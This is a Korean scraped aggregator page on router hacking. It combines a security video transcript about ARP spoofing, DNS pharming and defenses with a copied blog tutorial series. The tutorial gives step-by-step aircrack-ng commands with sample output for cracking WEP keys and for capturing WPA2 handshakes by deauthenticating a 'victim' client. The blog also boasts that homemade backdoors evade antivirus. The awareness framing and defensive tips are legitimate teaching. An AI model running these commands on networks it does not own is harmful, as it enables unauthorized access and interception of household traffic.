Skip to content
Home » 공유기 해킹 방법 | 공유기 해킹 : 해커들은 공유기를 왜? 좋아할까? 보안쟁이가 알려주는 대처 방법(홈네트워크 Iot 파밍 보안) 208 개의 자세한 답변

공유기 해킹 방법 | 공유기 해킹 : 해커들은 공유기를 왜? 좋아할까? 보안쟁이가 알려주는 대처 방법(홈네트워크 Iot 파밍 보안) 208 개의 자세한 답변

당신은 주제를 찾고 있습니까 “공유기 해킹 방법 – 공유기 해킹 : 해커들은 공유기를 왜? 좋아할까? 보안쟁이가 알려주는 대처 방법(홈네트워크 IoT 파밍 보안)“? 다음 카테고리의 웹사이트 https://hu.taphoamini.com 에서 귀하의 모든 질문에 답변해 드립니다: https://hu.taphoamini.com/photos/. 바로 아래에서 답을 찾을 수 있습니다. 작성자 보안쟁이 이(가) 작성한 기사에는 조회수 32,692회 및 좋아요 560개 개의 좋아요가 있습니다.

Table of Contents

공유기 해킹 방법 주제에 대한 동영상 보기

여기에서 이 주제에 대한 비디오를 시청하십시오. 주의 깊게 살펴보고 읽고 있는 내용에 대한 피드백을 제공하세요!

d여기에서 공유기 해킹 : 해커들은 공유기를 왜? 좋아할까? 보안쟁이가 알려주는 대처 방법(홈네트워크 IoT 파밍 보안) – 공유기 해킹 방법 주제에 대한 세부정보를 참조하세요

No.28
안녕하세요 보안쟁이 PR입니다.
나는 집에서 내 휴대폰을 보며 누워서 인터넷만 했는데…
내 계정정보가 털렸다고? 어라 바이러스도 걸렸네…
뭐지?
나는 이상한 사이트에 들어간 적도 없고 착하게만 살았는데…
더러운 세상~ 어떻게 털린 거지?
혹시 방금 한 이야기가 영상을 시청하시는 당신 You의 이야기인가요?
그럼 잘 오셨습니다.
어떻게 계정정보를 털어갔는지 보안쟁이 PR이 모두 알려드리겠습니다.
그럼 시작해보겠습니다.
가정이나 사무실에 손쉽게 유무선 공유기를 볼 수 있는데요
바로 요것!!
공유기의 해킹으로 인해서 개인정보를 탈취당하거나 악성코드 또는 바이러스의 감염으로 피해가 발생했다는 것은 오늘, 내일의 이야기가 아닙니다.
그럼 해커는 공유기를 왜 이렇게 좋아할까요?
유무선 공유기는 집안에 네트워크를 인터넷과 연결해주는 길목의 역할을 하기 때문인데요
그래서 보안에 중요하지만 현실은 방치되어 있죠?
해커의 공격 방법을 이야기하기 전에 우리 집에 공유기가 어떻게 설치되어 있는지 네트워크 구성도를 보면 공격 방법을 더 이해하기가 쉽습니다.
가정집에서 흔히 볼 수 있는 구성입니다.
상위 단에 통신사 모뎀을 거쳐 공유기에서 거실에 TV와 각방에 컴퓨터와 노트북 무선 Wi-Fi로 스마트폰과 IoT 장비를 연결해서 사용합니다.
해커가 공유기에 관리자 admin 권한을 가지면 내부 모든 시스템 컴퓨터, 노트북, TV와 가장 중요한 스마트폰 최근
다양한 IoT 장비를 어디든지 접속할 수 있다는 이야기입니다.
공유기가 해킹되면 해커는 무엇을 할까요?
해커가 무엇을 얻으려고 하는지를 생각하면 방어도 어떻게 해야 하는지를 알 수 있습니다.
최종 목적은 돈이고 공유기에 돈이 들어있지는 않지요?
하지만 우리의 개인정보가 왔다 갔다 하고 있습니다.
그 개인정보를 훔쳐 돈으로 바꾸는데요
방법은 크게 세가지 입니다.
1. 가로채기 상당수의 공유기 사용자의 경우
무선인증 패스워드를 기본으로 설정하거나 취약한 인증 방식 WEP를 사용하고 있어 공격자는 해당 공유기를 통해
제공되는 무선 네트워크에 접속할 수 있고 이후 ARP Spoofing 등의 공격 기법을 통해서 평문으로 전송되는 사용자의
계정 금융 정보 등 개인정보를 탈취할 수 있습니다.
공유기를 해킹 당하면 해커는
2. 파밍으로 개인정보를 탈취합니다.
게임에서 아이템이나 골드를 모으는 파밍 말고요
파밍이란?
공격자는 공유기를 해킹해 DNS 정보를 변경하여 스마트폰 사용자가 변조된 사이트로 접속할 수 있도록 만듭니다.
인터넷 접속시 페이지를 Redirect 하여 개인정보를 입력하도록 유도합니다.
스마트폰의 경우 업데이트 진행을 안내하는 변조된 팝업창을 통해 확장자가 apk 파일을 설치하고 스마트폰에 악성코드
및 바이러스를 감염 시켜 개인정보 탈취 및 악의적인 목적에 이용합니다.
이 방법을 사용하면 사용자가 평소와 동일하게 네이버나 은행 사이트에 접속하였음에도 가짜 웹사이트로 접속하도록
접속 경로를 변조하여 로그인을 유도하고 스마트폰에 심어 놓은 apk 악성파일로 인증 문자 탈취를 통한 신규 계정
생성 등 다양한 공격을 할 수 있습니다.
3. DDoS 공격의 악용
감염된 다수의 공유기와 공유기에 연결된 다수의 IoT 장비를 통한 DDoS 공격 좀비로 활용할 수도 있습니다.
그럼 이제 방어하는 방법을 알아볼까요?
1. 외부에서는 공유기에 관리 페이지로 접속할 수 없도록 설정한다.
반드시 필요한 경우만 사용하고 원격 접속 관리자 권한은 사용하지 않는게 좋습니다.
내부 접속 보안도 허용할 IP만 접속 권한을 부여한다.
또 불가피한 외부 접속시 포트를 80, 8080이 아닌 동적 포트 구간으로 변경해야 합니다.
2. 관리자 admin 아이디나 패스워드를 변경해야 합니다.
초기 아이디 패스워드는 인터넷에서 쉽게 알 수 있는데요
이전 영상 홈캠, IP 카메라, 해킹 편을 참조해 주세요
3. 무선 암호화 방식은 보안 강도가 높은 WPA2 이상을 사용한다.
4. 공유기 펌웨어 업데이트는 주기적으로 업데이트해야 합니다.
5. SSID 외부에서 보이지 않도록 설정한다.
SSID 설정으로 외부에 공유기를 숨기는 팁을 보여드리며
영상을 마무리하겠습니다.
가장 많이 사용하는 ip TIME 제품인데요
무선 네트워크 설정/보안에서 SSID 이름을 보안쟁이라고 해놨습니다.
여기서 무선 네트워크이름 알림을 체크하고 적용해주면 주변 Wi-Fi 검색에서 여기 보면 보안쟁이라고 올라오는 걸 볼 수가 있죠?
그런데 이 부분을 숨김 처리할 수 있습니다.
보시면 방금 없어졌잖아요?
이렇게 주변 SSID에서 제 Wi-Fi가 검색되지 않도록 숨김 처리를 하는 거고요
이렇게 숨겼을 때는 Wi-Fi 네트워크 추가에서 이렇게 보안쟁이라고
찾아주면 뜨는 거를 볼 수가 있습니다.
이렇게 아이디 패스워드를 입력하고 들어가면 되고요
한번 연결을 해 놓으면 그다음부터는 자동으로 찾기 때문에 사용하시는데 불편함은 없을 거라고 생각됩니다.
오늘 영상을 시청해 주셔서 너무 감사드리고요
자유로운 의견은 댓글로 남겨 주세요
도움이 되셨다면 좋아요와 구독 잊지 마시고요
그럼 오늘도 행복하세요
홈페이지 http://www.prsystem.kr
네이버카페 https://cafe.naver.com/prsystem17
블 로 그 https://blog.naver.com/prsystem17
페이스북 https://www.facebook.com/prsystem17

공유기 해킹 방법 주제에 대한 자세한 내용은 여기를 참조하세요.

공유기 뚫기

인터넷을 조금만 찾아보면, 해킹하는 방법이 주르르 나옵니다. … 건너뛰어서 라우터/유무선공유기 해킹에 대해 얘기해볼까 합니다.

+ 여기를 클릭

Source: crasony.tistory.com

Date Published: 8/20/2021

View: 6639

연예인 폰 해킹 어떻게? 25초 만에 뚫린 ‘인터넷 공유기’

한 보안 전문가는 ‘인터넷 공유기’를 의심하며 “누군가를 특정해 해킹 할 수 있는 가장 쉬운 방법”이라 밝혔다. 인터넷 공유기는 가정 내 ‘네트워크 …

+ 더 읽기

Source: m.joseilbo.com

Date Published: 3/20/2022

View: 8882

와이파이 비밀번호 해킹하는 방법 – ITWorld Korea

공유기 재설정은 아무에게도 묻지 않고 네트워크에 연결할 수 있는 방법일 수 있다. 그러나 기본값을 변경한 경우, 공유기를 초기 설정으로 다시 설정해야 …

+ 여기를 클릭

Source: www.itworld.co.kr

Date Published: 5/12/2021

View: 133

공유기 해킹 방법 정리 – Pwnbit.kr = )

최근 주변에서 공유기가 해킹당해 DNS 변조를 통한 공격을 당한 사례를 많이 접했다. 와이파이를 위해 각 집마다 무선 공유기 1개씩은 가지고 있다고 …

+ 여기에 더 보기

Source: pwnbit.kr

Date Published: 11/24/2022

View: 9054

와이파이 암호화 원리와 실제 해킹 실습[WIFI해킹/모의해킹]

동영상과 텍스트로 공부하는 온라인 정보보안 교육 플랫폼 놀리팝 위드 더 많은 지식이 있는 새로운 세계에 초대 …

+ 여기에 보기

Source: www.youtube.com

Date Published: 4/26/2022

View: 238

해커들은 공유기를 왜? 좋아할까? 보안쟁이가 알려주는 대처 …

공유기 해킹 : 해커들은 공유기를 왜? 좋아할까? 보안쟁이가 알려주는 대처 방법(홈네트워크 IoT 파밍 보안). 32,649 views Premiered Jul 19, …

+ 여기를 클릭

Source: www.youtube.com

Date Published: 11/10/2022

View: 1370

무선 라우터를 해킹하는 법 – 더 많은 일을 할 2022

Lang L: none (table-of-contents): · WPA2 무선 암호화 사용 강력한 SSID 네트워크 이름 및 미리 공유 된 키 만들기 · 무선 라우터의 방화벽 켜기 · 라우터 수준에서 암호화 …

+ 여기에 표시

Source: kor.go-travels.com

Date Published: 2/6/2021

View: 5362

네트워크 해킹 – 나무위키:대문

가장 단순한 네트워크 해킹 기법으로는 DDoS 공격과 백도어 설치가 있다. … 이런 방법으로 보안이 약한 공유기의 권한을 탈취하기도 한다.

+ 더 읽기

Source: namu.wiki

Date Published: 8/11/2022

View: 4389

공유기 보안 어떻게 해야 할까? 안전한 공유기 보안을 위한 가이드

주요 수법은 무선 공유기의 DNS(Domain Name System)를 변조하는 방법으로, … 이 밖에도 공유기 해킹을 통해 금융감독원으로 위장한 파밍사이트로 …

+ 자세한 내용은 여기를 클릭하십시오

Source: m.blog.naver.com

Date Published: 4/20/2021

View: 4581

주제와 관련된 이미지 공유기 해킹 방법

주제와 관련된 더 많은 사진을 참조하십시오 공유기 해킹 : 해커들은 공유기를 왜? 좋아할까? 보안쟁이가 알려주는 대처 방법(홈네트워크 IoT 파밍 보안). 댓글에서 더 많은 관련 이미지를 보거나 필요한 경우 더 많은 관련 기사를 볼 수 있습니다.

공유기 해킹 : 해커들은 공유기를 왜? 좋아할까? 보안쟁이가 알려주는 대처 방법(홈네트워크 IoT 파밍 보안)
공유기 해킹 : 해커들은 공유기를 왜? 좋아할까? 보안쟁이가 알려주는 대처 방법(홈네트워크 IoT 파밍 보안)

주제에 대한 기사 평가 공유기 해킹 방법

  • Author: 보안쟁이
  • Views: 조회수 32,692회
  • Likes: 좋아요 560개
  • Date Published: 최초 공개: 2019. 7. 19.
  • Video Url link: https://www.youtube.com/watch?v=QxVpXSjNNO4

공유기 뚫기

이 사이트에 좋은거 많눼-0-^

http://jocker.tistory.com/163

여기도 대충

http://kldp.org/node/119302

왜 이런 포스팅을 하냐구요?

너무 쉽기 때문입니다.

인터넷을 조금만 찾아보면, 해킹하는 방법이 주르르 나옵니다.

각종 해킹툴과 해킹 강좌가 많아 어린애도 해킹할수 있을 정도로 쉽습니다.

그게 무슨뜻이냐구요?

나의 컴퓨터가 해킹당하기가 너무 쉽다는 뜻입니다.

많이 알면 많이 알수록 내가 해킹당하는게 얼마나 쉬운지 알게 됩니다.

그래서! 우리 함께 해킹을 배워보며 우리 자신의 컴퓨터 보안이 얼마나 허술한지 깨닫고 보완해보도록 하는게 이번 포스팅의 취지입니다.

1부는 간단하게 시작해보자는 차원에서, 많은분들이 알고 계시는 해킹툴과 백도어로 시작하겠습니다.

어릴때 처음 해킹에 관심을 가지고 알아보던중 알게되어, 시도해본 결과 놀랍도록 쉽게 성공했던 방법이지요.

과장 없이 말그대로 어린애도 할수있는 해킹입니다……

넷버스

스쿨버스

백오리피스

프로렛

서브세븐

네! 그렇습니다. 많은분들이 알고계시는 추억의 백도어 프로그램들입니다 ㅋㅋㅋㅋ

너무나도 많은분들이 알고 계시고, 사용법이 쉬운 관계로 딱히 설명할 필요는 없는것 같군요.

백도어란:

사용자가 바이러스가 걸린 프로그램들 다운받아 실행시키는것으로 시작됩니다.

이 프로그램은 각종 유틸,게임,음란물로 위장해 인터넷에 떠돌기도 하고, 해커들이 직접 피씨방을 돌아다니며 깔아두기도 합니다.

이 백도어 프로그램은 감염 컴퓨터에서 미리 지정된 포트로 서버를 열어 해커의 접속을 기다리거나, 혹은 미리 지정된 명령에 따라 정보 빼돌려서 전송, 등등의 역할을 합니다.

해커는 이렇게 감염된 컴퓨터에 너무나도 쉽게 접속해 각종 정보를 빼가거나,시스템을 장악해 여러 명령을 내릴수 있습니다.

그리스 로마 신화의 트로이목마 와 비교하여 트로이목마, 트로이,trojan 등으로 불리기도 하지요

워낙 유명해서 요즘은 모든 백신에 막히고, 또 라우터의 보급화 때문에 실전에서 사용하기가 무척 어렵다는 단점이 있지요.

그렇다면 안심해도 되느냐구요?

아닙니다. 위에 언급한 해킹툴은 구시대 유물이라 불가능합니다만, 컴퓨터 프로그래밍을 할줄 아는 사람이라면 이 모든 장벽을 뛰어넘는 백도어를 만드는게 별로 어렵지는 않기 때문입니다.

백신이요? 그거야 뭐 직접 만든 백도어가 널리 퍼지고 퍼져서 백신회사 귀에 들어가기 전까지는 걱정할 필요가 없습니다. 거기다 요즘은 백신이 알아채고 업데이트하는 시간에 맞추어 자기 자신의 코드를 변경해 자가 업데이트하며 백신으로부터 피해다니는 백도어 또한 존재합니다.

라우터요? 훗. 포트포워딩이라.. 어차피 서버를 열어 해커가 직접 연결할때만 필요한것이지, 정보를 빼돌린다거나 할때에는 아무런 장애도 안됩니다. 또 대놓고 백도어가 깔리면서 지가 알아서 포트포워딩을 해버리는것또한 가능하구요. 그게 아니라면 서버가 아니라 클라이언트로 활동하게 되면 라우터를 피할수 있습니다.

일례로,

[ARCHIEVES/Programming.관련] – [강좌] 네트워크 프로그래밍 – 에러 수정하였습니다.

를 활용하여, 채팅프로그램 대신 백도어를 만들수 있습니다. 백신에 안잡힙니다. 백도어를 클라이언트로 설정하고 미리 지정해둔 서버로 연결하게 하면 라우터도 아주 쉽게 바이패스 할수 있습니다. 그게 아니라면 미리 지정해둔 이메일 등으로 특정 폴더의 특정 파일을 전송할수도 있습니다.

그럼 우리가 백도어에 감염되는것을 피하기 위한 방어는 어떻게 해야 할까요? 우선 바이러스 백신을 깔아줍니다. 삐까뻔적한것보다 AVG 카스퍼스키 정도가 오히려 낫습니다.

윈도우 방화벽을 사용합니다. 의심가는 네트워크 연결을 차단하거나 유저에게 물어봅니다.

왠지 의심되는 프로그램은 깔지 않거나, sandbox 해줍니다.

윈도우 보안 업데이트 시키는대로 자주 해줍니다.

필요를 느끼신다면, 네트워크 감시 프로그램등으로 어떤 프로그램이 어떤 포트를 어떻게 사용하고 있는지 감시할수 있습니다.

아무리 내 개인 컴퓨터라도, 중요 정보는 아무렇게나 내버려두지 말고 특수 관리를 해줍니다. (암호화, 등등)

내 컴퓨터가 감염될수 있다는 사실을 자각하시고, 항상 주의하세요. 컴퓨터 할때마다 불안에 떨 필요는 없지만 너무 안일한 태도는 좋지 않습니다.

1부인 만큼 여러 분들이 이미 접해보셨을 주제를 선택했습니다.

해킹툴이 이슈가 되었던 적이 여러번이라 워낙 뒷북인 느낌이 없잖아 있습니다만, 차근차근 좀더 요즘 실질적인 위협이 되고 있는 주제로 넘어가겠습니다.

악용하시는분들에 대한 책임은 지지 않습니다

1부에서는 백도어에 대해 알아보았습니다.

말 그대로 알아만 보았습니다.

한건 없고 알아만 보았습니다.

[조커와 함께 해킹을] – 조커와 함께 배우는 해킹 -1부 해킹툴과 백도어

2부에서는 확! 건너뛰어서 라우터/유무선공유기 해킹에 대해 얘기해볼까 합니다.

1부 백도어가 좀 더 직접적으로 개인정보에 악영향을 줄수 있는게 확연히 보였던 반면,

라우터 해킹은 일단 그 자체로서는 수위가 덜하다고 보여질수도 있습니다.

뭐, 어찌보면 겉보기에 일단은 옆집 인터넷 훔쳐쓰는 정도니까요. (과연 그럴까요? 아닙니다! 백도어보다 훨씬 위험할수 있습니다)

요즘 세상에 여러분 모두 라우터를 비밀번호조차 걸어두지 않고 사용하시는분들은 없을거라 믿습니다.

나 인터넷 별로 안하는데 옆집이랑 나눠쓰지 뭐 허허…가 아닙니다!!! 모르는사람에게 라우터 사용을 허락하시면 개인정보 보호에 취약해집니다.

정확한 이유는 3부에서 알려드리겠습니다만, 한번 더 언급하자면,

바이러스 백신 깔고 방화벽 켜고 어쩌고 저쩌고 하는것보다 20배는 더 중요한게 개인 라우터 보호입니다.

자, 그럼 라우터 해킹을 본격적으로 시작해보도록 하겠습니다 (응?)

1부에서 언급했다시피, 제가 해킹 강좌를 올리는 이유는 좀 더 많은분들께 허술한 보안상태의 위험을 알리기 위해서랍니다.

해킹을 배우다보면 ” 헐… 내컴도 완전 허술하구나.. 그 누구라도 마음만 먹으면 내컴 뚫는건 시간문제로구나… ” 라는걸 깨닫게 됩니다.

그리고 자기가 알아낸 해킹법으로 부터 안전할수 있도록 대비하게 되지요.

제 의견으로는, 많은 분들이 해킹법을 알면 알수록, 해킹에 대한 피해를 최소화 할수 있다고 생각합니다.

악용하시는분들에 대한 책임은 지지 않습니다

요즘 라우터 비밀번호의 대표적인 방식은 크게 두가지가 있습니다.

WEP 과 WPA/WPA2 이지요.

요즘 나오는 대부분의 라우터는 이 두가지는 최소한 기본적으로 지원하고 있습니다.

오늘 해킹해볼 방식은 WEP 입니다.

다른말로 하자면, 라우터 보안은 WPA2를 사용하세요! WEP는 뚫립니다!

얼마나 쉽게 뚫리는지 알아볼까요?

저는 리눅스를 기준으로 설명하겠습니다만, 윈도우에서도 가능한것으로 알고 있습니다.

우선, 몇가지 준비가 필요합니다.

1. 프로그램이 필요합니다. Aircrack-ng 라는 프로그램인데요. http://www.aircrack-ng.org/ 에서 받을수 있습니다.

2. 무선랜카드가 Injection이 가능한 칩을 사용하는 기종이어야 합니다. 최근것은 거의 다 가능한것 같습니다.

3. 무선랜카드 Injection이 가능한 드라이버가 깔려있어야 합니다. 이것도 왠만하면 이미 깔려있다고 보시면 됩니다.

2번과 3번은 각자 알아서 하십쇼 ㅋㅋㅋ;; (아 이래도 되는걸까) 실제로 도움을 드리긴 어려운 부분이고, 각자 자신의 칩에 대해 조사해보셔야 합니다. 혹은, 그냥 대놓고 따라해보시고 아싸! 된다! 혹은 아썅! 안된다! 하시면 됩니다.

시작해봅시다.

일단 이론을 설명하자면….

무선공유기에게 끊임없는 ARP Request 를 보내 얻는 IV를 모아서 그 패턴을 분석해 비밀번호를 찾을수 있습니다. ARP (Address Resolution Protocol)란 공유기시스템이 아이피 주소와 맥주소를 맵핑시킬때 사용되는 프로토콜입니다. 어떤 호스트가 physical address를 얻기 위해서 시스템에접 ARP Request를 보내면, 해당 주소를 가지고 있는 호스트가 대답해서 physical address를 불러주는 방식입니다. ARP는 여러 해킹공격에 널리 이용된는 프로토콜중 하나입니다.

공유기에 ARP Request를 보내게 되면 공유기가 IV로 대답을 합니다. 이 IV를 여러개 (엄청많이) 모으게 되면 그 사이의 패턴 분석을 통해 키를 알아내게 되는것 입니다.

복잡하죠? 이론은 몰라도 됩니다. 저도 햇갈립니다.

우리는 전문 해커가 아니니까요. 되는 방법만 알면 되지 어떻게 되는지 알필요 있겠습니까.. ㅋㅋ

따라해보실때에는 본인 공유기를 대상으로 하시거나 주인의 동의를 얻어 교육용으로 실습해보세요. 옆집꺼 해킹하는건 불법이랍니다.

1. 무선 인터페이스를 Monitor모드로 작동시킵니다.

airmon-ng start wlan0

여기서 wlan0는 자신의 무선인터페이스입니다. ath0 wifi0 등등 시스템/랜카드에 따라 다를수 있습니다.

airmon-ng

를 쳐보시면 현재의 인터페이스 이름을 보실수 있습니다. 이미 monitor 모드가 시작된 경우 mon0 라는 인터페이가 추가로 보입니다.

2. 인젝션 테스트

aireplay-ng -9 -e jocker -a 00:12:34:56:78:90 mon0

뜻:

-9 : 인젝션 테스트 -e jocker : 공유기 이름 -a 00:12:34:56:78:90 : 공유기 맥주소 mon0 : 모니터모드 인터페이스

공유기 맥주소를 모르시면

airodump-ng mon0

를 이용해 근처 공유기 정보를 볼수 있습니다.

이 커맨드를 사용하면 터미널이 트랩되므로 필요한 정보 획득 후에는 ctrl+c 를 눌러 종료시키시면 됩니다.

결과는 이런식으로 떠야 합니다.

09:23:35 Waiting for beacon frame (BSSID: 00:12:34:56:78:90) on channel 9 09:23:35 Trying broadcast probe requests… 09:23:35 Injection is working! 09:23:37 Found 1 AP 09:23:37 Trying directed probe requests… 09:23:37 00:12:34:56:78:90 – channel: 9 – ‘jocker’

09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73 09:23:39 30/30: 100%

마지막 줄이 100%나 거의 100% 근처가 아니라면 공유기에서 너무 멀리 떨어져있다는 뜻이구요 0%라면 인젝션이 안되는 랜카드 혹은 드라이버라는 뜻입니다.

3. Airodump-ng 를 실행해서 IV 캡춰 시작

airodump-ng -c 9 –bssid 00:12:34:56:78:90 -w dump mon0

뜻:

-c : 공유기 채널 –bssid 00:12:34:56:78:90 : 공유기 맥주소 -w dump : dump라는 파일명으로 저장 mon0 : 모니터용 인터페이스

결과:

CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:12:34:56:78:90 42 100 5240 178307 338 9 54 WEP WEP jocker BSSID STATION PWR Lost Packets Probes 00:12:34:56:78:90 00:11:22:33:44:55 42 0 183782

4. 공유기 인증 얻어내기

위의 창 돌리는상태에서 새 터미널 실행.

aireplay-ng -1 0 -e jocker -a 00:12:34:56:78:90 -h 00:11:22:33:44:5 mon0

뜻:

-1 : (가짜)인증받으라는뜻 0 : 딜레이시간 -e jocker : 공유기이름 -a 00:12:34:56:78:90 : 공유기 맥주소 -h 00:11:22:33:44:55 내 맥주소 mon0 : 모니터인터페이스

결과:

18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful 🙂

5. ARP 따발총 쏘기

aireplay-ng -3 -b 00:12:34:56:78:90 -h 00:11:22:33:44:55 mon0

뜻:

-3 : 따발따발 -b : 이정도 했으면 아실거에요 -h : 이것도 위에랑 같애요 mon0 : 이것도요

결과:

Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets…

페킷숫자가 쭉쭉 올라갑니다.

동시에 airodump 실행시키고있는 터미널에서는 공유기 통신량이 확 올라간걸 보실수 있습니다.

#/s 가 300-400 이상이면 잘 되고 있는겁니다.

6. 분석해서 키 얻기

새 터미널 켜시고

aircrack-ng -b 00:12:34:56:78:90 dump*

뜻:

-b : 공유기맥주소 dump* : 아까 적었던 저장파일 이름

IV가 충분하다면 키를 얻을수 있습니다.

IV가 모자라서 실패하면 모일때까지 좀 기다려주셨다 다시 시도 하셔야 할수도 있습니다. 보

통 64비트 암호는 약 25만개, 128비트 암호는 약 150만개 정도 있으면 된다고 하지만….. 뭐…..

제 경험으론 리플레이 시키고 한 30초 있다 분석 시작하시면 64비트는 거의 바로 나오구요.

128비트는 커피한잔 하시고 오시면 나옵니다.

여기까지 따라하시고 안되시는분들도 계실수 있습니다.

해킹이라는게 명령어 시키는대로 적어서 다 되는게 아니니까요.

시스템에 따라 다르기도 하고 상황에 따라 다르기도 하구요

하지만 기본은 이런 방식이구요. 따라하시면 왠만하면 뚫립니다.

편집안된 3분48초짜리 비디오입니다. 이 시간이면 뚫습니다.

방어합시다: 공유기 암호 꼭 걸어둡니다

WEP를 쓰지 않습니다. WPA2를 사용합시다

꼭 써야한다면 128비트로 합시다.. 아니, 그냥 아무래도 쓰지 않는게 좋겠습니다.

WEP를 쓰지 않습니다

WEP를 절대 쓰지 않습니다

무슨일이 있어도 WEP를 쓰지 않습니다

WEP는 그냥 쓰지 않습니다. 절대. 네버 포에버.

악용하시는분들에 대한 책임은 지지 않습니다

자, 다음회에는 WPA2도 뚫어봅시다

2부 전편에서는 WEP방식 공유기 비밀번호가 얼마나 쉽게 크랙되는지 알아보았죠.

[조커와 함께 해킹을] – 조커와 함께 배우는 해킹 -2부 유무선공유기 해킹 1/2

그렇다면 WPA2방식은 얼마나 안전할까요?

요즘 가장 보편화된 방식입니다. 95%의 개인 공유기는 WPA2로 인코딩되었습니다.

WPA2만 간단히 깰수 있다면 전세계 개인공유기 95%는 깬다는 뜻이죠.

결론부터 말씀드리자면, 가능합니다.

WPA2도 뚫립니다

다만, WEP처럼 쉽게 뿅뿅 뚤리지는 않습니다.

현재 알려진 해킹 기술로 WPA2를 뚫기 위해서는 BRUTE FORCE 방식, 혹은 DICTIONARY 방식으로 공격해야 합니다.

좀 더 쉽게 얘기하자면, 될때까지 이것저것 넣어본다는 뜻입니다.

웹툰 한국식 보안 상황에서 살아남는법 中

Brute Force 는 무식하게 힘으로 해결한다 라는 뜻입니다.

이름 짓는 센스 하나는 끝내줍니다. ㅋㅋ

어쨌든 이름에서 알수있다시피, 많이 무식한 방법이지요.

가장 많이 사용되는 8글자 패스워드위 경우 영문 대소문자, 숫자, 기호 까지 포함되어있다고 쳤을때 약 58년 이 소모됩니다

이 링크에 가시면 소모 시간 계산기가 있습니다.

우리가 WPA2를 뚫기 위해서는 약 60년만 컴퓨터 돌리고 있으면 나온다는 뜻입니다.

(우리는 전문 해커가 아니니 위의 웹툰에서처럼 그래픽카드 모딩과 분할작업은 하지 않는다고 칩시다.)

참 쉽죠잉?

.

..

네… 음… 흠흠..

그래서 나온 방법이 Dictionary Attack, 즉 사전공격 되겠습니다.

웹툰 한국식 보안 상황에서 살아남는법 中

말이 password querty 저따위지, 일례로 어떤 해커가 만들어 배포한 데이터베이스는 27기가입니다.

사람들이 넣어볼만한 암호를 목록으로 만들어둔게 27기가… 흠..

8글자 단어 하나에 32바이트가 사용됩니다.

약 905,969,664 개의 단어가 미리 준비되어있는 셈입니다. 1조 에 가깝네요.

당신이 사용하는 비밀번호가 이 단어중 하나라면, 확률이 상당히 높습니다만 , 60년동안 기다릴 필요 없이 바로 뚫리는겁니다.

오늘 설명해볼 방식은 이 데이터베이스를 이용한 사전공격입니다.

1부에서 언급했다시피, 제가 해킹 강좌를 올리는 이유는 좀 더 많은분들께 허술한 보안상태의 위험을 알리기 위해서랍니다.

해킹을 배우다보면 ” 헐… 내컴도 완전 허술하구나.. 그 누구라도 마음만 먹으면 내컴 뚫는건 시간문제로구나… ” 라는걸 깨닫게 됩니다.

그리고 자기가 알아낸 해킹법으로 부터 안전할수 있도록 대비하게 되지요.

제 의견으로는, 많은 분들이 해킹법을 알면 알수록, 해킹에 대한 피해를 최소화 할수 있다고 생각합니다.

악용하시는분들에 대한 책임은 지지 않습니다

따라해보실때에는 본인 공유기를 대상으로 하시거나 주인의 동의를 얻어 교육용으로 실습해보세요. 옆집꺼 해킹하는건 불법이랍니다.

준비:

자, 이전편과 마찬가지로 Aircrack-ng 가 필요합니다. 사전 데이터베이스도 필요합니다.

http://safe-linux.com/ 에서 배포하고 있습니다만…. 트래픽 제한때문에 속도가 개판입니다.

돈을 내면 트래픽을 풀어준다고 하는데,,, 알아서 하십쇼.

700메가 버젼, 2기가 버젼, 27기가 버젼이 있습니다. 물론 들어잇는 단어 수의 차이입니다.

지난회에서 많은 설명을 했기 때문에 중복되는부분은 설명없이 넘어가겠습니다.

1번. 모니터모드 실행

airmon-ng start wlan0

2번. airodump 캡춰

airodump-ng -w dump –bssid 00:12:34:56:78:90 -c 9 mon0

3번. aireplay를 이용해 현재 통신중인 컴퓨터를 인증해제시킵니다.

새 터미널입니다:

이번에는 많은 양의 IV 대신 비밀번호를 알고있는 컴퓨터와 공유기와의 로그인 프로세스(전문용어로 Handshake, 악수) 를 따와야 합니다.

그러기 위해 통신중인 컴퓨터를 인증해제 시키면, 자동으로 공유기와 컴퓨터가 다시 인증과정을 거치게 되고, 우리는 미리 실행시킨 airodump로 따올수 있는겁니다.

aireplay-ng –deauth 1 -a 00:12:34:45:78:90 -c 00:11:00:11:00:11:00 mon0

-c 00:11:00:11:00:11:00 : 현재 정상통신중인 컴퓨터 맥주소 (희생양)

4번. 제대로 handshake 따오는데 성공하였는지 airodump로 확인

아래에 빨간색으로 표시된 부분이 생깁니다.

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:12:34:56:78:90 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:12:34:56:78:90 39 100 51 116 14 9 54 WPA2 CCMP PSK jocker BSSID STATION PWR Lost Packets Probes 00:12:34:56:78:90 00:11:00:11:00:11 35 0 116

따오기 전의 화면:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:12:34:56:78:90 39 100 51 116 14 9 54 WPA2 CCMP PSK jocker BSSID STATION PWR Lost Packets Probes 00:12:34:56:78:90 00:11:00:11:00:11 35 0 116

5번. aircrack을 사용해서 사전공격 시작

aircrack-ng dump* -w ./wordlist.lst

dump* : 캡춰한 파일 이름 ./wordlist.lst : 사용되는 사전 데이터베이스 폴더와 이름

6번. 기다려서 뚫리나 안뚫리나 봅니다.

이번에도 상당히 간단한 방법이었습니다. (준비과정은 좀 복잡했지만..)

비록 사전공격이라고는 하나 데이터베이스가 클 경우 상당한 시간 이 소요될수 있습니다. (60년은 아닙니다)

동영상 시연입니다.

어떻습니까? 할만한가요?

저는 못해먹겠더라구요. 오래걸리고 에러나고…

하지만 확실한건, 가능하다는거, 딱히 어렵지는 않다는점 입니다.

그리고 WPA2방식이 요즘 사용되는 가장 보편적인 방법이라는점을 볼때,

약간의 노력만 하면 원하는집 라우터 뚫는거 가능하다. 라는게 중요한 점입니다.

그동안 해킹 강좌가 갑자기 뚝. 끊겼었죠.. ㅎㅎ;;

공유기해킹을 끝내고 바로 중간자공격, 패킷스니핑, 쿠키활용까지 나갈 예정이었습니다.

